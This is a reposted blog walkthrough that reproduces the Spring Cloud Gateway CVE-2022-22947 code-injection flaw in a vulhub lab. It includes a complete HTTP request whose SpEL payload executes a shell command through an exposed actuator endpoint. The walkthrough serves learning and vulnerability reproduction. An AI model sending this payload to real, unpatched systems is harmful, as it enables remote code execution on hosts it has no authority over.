Spring Cloud Gateway Remote Command Execution Vulnerability (CVE-2022-22947)

Mobile 2023-07-30 11:18:40 views: null

Table of contents


Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.

Vulnerability description

Applications using Spring Cloud Gateway are vulnerable to code injection when the Actuator endpoint is enabled, exposed, and insecure. An attacker can maliciously craft requests that allow arbitrary remote execution on a remote host.

When an attacker has access to the actuator API, the vulnerability can be exploited to execute arbitrary commands.

Sphere of influence

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway Other versions that are no longer updated

Environment build

Vulnerability environment construction, using vulhub, construction method, self-search.

After building successfully, visit

insert image description here

Vulnerability recurrence

  1. Check that the actuator endpoint is enabled

Capture packets and modify the interface to /actuator
insert image description here
2. View /actuator/gateway/routes

insert image description here
The returned routing information means that when accessing index, it is routed to http://example.com:80

  1. create route
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}

insert image description here

4. Refresh routing

insert image description here
5. Access the created route

insert image description here

6. Delete route

insert image description here

7. Refresh the route again

insert image description here

8. Then, visit the route and find that the route has been deleted

insert image description here

Guess you like

Origin blog.csdn.net/guo15890025019/article/details/129503346
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com